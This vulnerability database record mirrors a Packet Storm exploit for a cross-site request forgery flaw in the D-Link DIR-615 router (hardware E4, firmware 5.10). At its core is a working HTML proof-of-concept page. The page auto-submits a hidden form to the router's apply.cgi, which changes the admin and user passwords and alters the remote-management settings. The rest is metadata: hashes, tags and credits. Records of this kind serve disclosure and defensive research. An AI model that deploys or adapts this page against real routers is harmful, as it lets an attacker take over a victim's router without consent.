ID

VAR-E-201402-0548


TITLE

D-LINK DIR-615 Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 125307

DESCRIPTION

D-LINK DIR-615 hardware version E4 with firmware version 5.10 suffers from a cross site request forgery vulnerability.

Trust: 0.5

sources: PACKETSTORM: 125307

AFFECTED PRODUCTS

vendor:d linkmodel:dir-615scope: - version: -

Trust: 0.5

sources: PACKETSTORM: 125307

EXPLOIT

####################################################################################

# Exploit Title: Dlink DIR-615 Hardware Version E4 Firmware Verion 5.10
CSRF Vulnerability
# Google Dork: N/A
# Date: 19/02/2014
# Exploit Author: Dhruv Shah
# Vendor Homepage:
http://www.dlink.com/us/en/home-solutions/connect/routers/dir-615-wireless-n-300-router
# Software Link: N/A
# Hardware Version:E4

# Firmware Version:5.10
# Tested on: Router Web Server
# CVE : N/A

###################################################################################

Cross Site Request Forgery

This Modem's Web Application , suffers from Cross-site request forgery

through which attacker can manipulate user data via sending him malicious

craft url.

The Modems's Application not using any security token to prevent it

against CSRF. You can manipulate any userdata. PoC and Exploit to change

user password:

In the POC the IP address in the POST is the modems IP address.



<html>

<body>

<form id ="poc"action="http://192.168.0.1/apply.cgi"
method="POST">

<input type="hidden" name="html_response_page"
value="back.asp" />

<input type="hidden" name="html_response_message"
value="The setting is saved." />

<input type="hidden" name="html_response_return_page"
value="login.asp" />

<input type="hidden" name="reboot_type" value="none" />

<input type="hidden" name="button1" value="Save Settings" />

<input type="hidden" name="admin_password" value="test" />

<input type="hidden" name="admin_password1" value="test" />

<input type="hidden" name="admPass2" value="test" />

<input type="hidden" name="user_password" value="test" />

<input type="hidden" name="user_password1" value="test" />

<input type="hidden" name="usrPass2" value="test" />

<input type="hidden" name="hostname" value="DIR-615" />

<input type="hidden" name="graphical_enable" value="1" />

<input type="hidden" name="graph_auth_enable" value="1" />

<input type="hidden" name="remote_http_management_enable"
value="0" />

<input type="hidden"
name="remote_http_management_inbound_filter"
value="Allow_All" />

</form>

</body>

<script
type="text/javascript">document.getElementById("poc").submit();</script>

</html>

______________________

*Dhruv Shah* *aka Snypter*

Blogger | Researcher | Consultant | Writer
Youtube <http://www.youtube.com/snypter> |
Facebook<http://www.facebook.com/dhruvshahs>|
Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> |
Twitter<https://twitter.com/Snypter>|
Blog <http://security-geek.in/blog/>

Trust: 0.5

sources: PACKETSTORM: 125307

EXPLOIT HASH

LOCAL

SOURCE

md5: 4a6e9732a84914fe0e2a004c2e2597c4
sha-1: 46e108dc814b67076f1dd3063d774a53db00b637
sha-256: 79c1fce86910caf00ee360dd0bfae7427428d7e44f5672f4781cd8741683517e
md5: 4a6e9732a84914fe0e2a004c2e2597c4

Trust: 0.5

sources: PACKETSTORM: 125307

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 125307

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 125307

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 125307

CREDITS

Dhruv Shah

Trust: 0.5

sources: PACKETSTORM: 125307

EXTERNAL IDS

db:PACKETSTORMid:125307

Trust: 0.5

sources: PACKETSTORM: 125307

SOURCES

db:PACKETSTORMid:125307

LAST UPDATE DATE

2022-07-27T09:54:20.432000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:125307date:2014-02-20T00:55:55